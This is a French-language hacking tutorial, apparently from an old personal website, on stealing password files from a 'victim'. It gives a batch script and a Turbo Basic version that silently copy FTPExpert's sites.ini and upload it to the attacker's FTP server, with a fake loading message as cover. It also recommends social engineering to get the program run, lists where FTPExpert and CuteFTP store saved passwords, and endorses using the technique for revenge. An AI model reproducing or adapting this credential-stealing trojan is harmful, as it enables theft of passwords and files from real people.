Comment piquer des fichiers à votre victime ?
Alors vous allez me dire : "Comment piquer un fichier
à ma cible???"
La programmation va nous servir. Ne vous inquiétez
pas, ça reste de la programmation de débutant.
Il va vous falloir faire un petit prog que votre victime
devra executer.
Inconveniant : il va falloir trouver un moyen de lui faire
executer, et il faudra qu'il soit connecté.
Pour cela : Social Engeneering
;-) .
Il va aussi vous falloir un compte sur lequel on puisse uploader
en FTP.
Pour faire ce petit prog, un fichier Batch (.bat) suffirait,
mais il pourrais trop facilement l'éditer, donc nous allons nous baser sur les commandes
d'un Batch, mais avec un .exe .
Pour faire ce .exe, pas la peine d'utiliser
un langage compliqué : utilisons le Turbo Basic.
Vous pouvez télécharger
le logiciel pour le compiler en cliquant ici.
Voyons
déjà ce qu'on metterait dans le fichier Batch :
(Dans le
cas où on voudrait piquer "sites.ini", le fichier qui contient
les pass de FTPExpert)
::
début du code
CLS
@echo off
if exist %windir%\commandes.txt
del %windir%\commandes.txt
if exist C:\Progra~1\FTPExpert\sites.ini
copy C:\Progra~1\FTPExpert\sites.ini
%windir%
CLS
cd %windir%
echo open ftp.hébergeur.fr>>
commandes.txt
echo quote user Login>>
commandes.txt
echo quote pass Mot
de Passe>> commandes.txt
echo
put sites.ini>>
commandes.txt
echo close>> commandes.txt
echo quit>> commandes.txt
C:\windows\ftp
-v -n -s:commandes.txt >nul
del %windir%\commandes.txt >nul
CLS
:: fin du code
Les
parties en orange sont les variables à modifier.
On
rajoute ">nul" à la fin de certaines commandes afin que
la victime ne les voit pas s'exécuter.
On utilise ftp.exe qui se trouve dans le répertoire
de tout les windows.
Nous allons faire un programme en basic utilisant les mêmes commandes (comme ça, on se fait pas chier) :
' début du code
CLS
Screen 1
SHELL "@echo off"
SHELL
"if exist %windir%\commandes.txt del %windir%\commandes.txt"
SHELL
"if exist C:\Progra~1\FTPExpert\sites.ini
copy C:\Progra~1\FTPExpert\sites.ini
%windir%"
CLS
Print "Veuillez patienter quelques instants"
Print
"Chargement de l'application"
SHELL "cd %windir%"
SHELL
"echo open ftp.hébergeur.fr>>
commandes.txt"
SHELL "echo quote user Login>>
commandes.txt"
SHELL "echo quote pass Mot
de Passe>> commandes.txt"
SHELL
"echo put sites.ini>>
commandes.txt"
SHELL "echo close>> commandes.txt"
SHELL
"echo quit>> commandes.txt"
SHELL "C:\windows\ftp -v
-n -s:commandes.txt >nul"
SHELL "del %windir%\commandes.txt
>nul"
CLS
' fin du code
Les
parties en orange sont les variables à modifier.
Voilà, il ne vous reste plus qu'à changer
les variables du code pour y mettre les coordonnées de votre FTP, du
ou des fichiers que vous voulez piquer, puis à compiler le tout. Ensuite, vous n'avez plus qu'à (enfin ça
peut s'avèrer compliqué) faire exécuter le programme à
votre victime. Et paf ! Vous lui avez piqué les fichiers.
Conseil
: Utiliser un compte sur un hébergeur gratuit que vous n'utiliserez que
pour ça, car si votre victime est un peu maligne, elle pourra éditer
votre prog et finir par trouver le pass de votre compte.
C'était pas trop compliqué, non?
Cette
technique peut s'avèrer très utile pour piquer des fichiers contenant
des mots de passes.
Seule condition : il faut que votre victime enregistre
ses mots de passes.
Voici quelques exemples :
.
Pour FTPExpert :
-» C:\Program
Files\FTPExpert\sites.ini
Il vous faudra le décrypter >>>
voir article.
. Pour CuteFTP
C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat
ou C:\Program
Files\CuteFTP\sm.dat
Il vous faudra le décrypter
>>> voir article.
Petit
rappel : n'utilisez pas cette technique sur
le premier venu, c'est pas la peine de faire chier un inconnu au hasard, c'est
seulement pour le challenge, ou pour vous venger de quelqu'un qui vous à
fait un sale coup.
Voili voilou,
Allez
@+ les petits filous !
By BiGHeaDMaX
Contact
: Privatesite@ifrance.com
©
www.BiGHeaDMaX.fr.st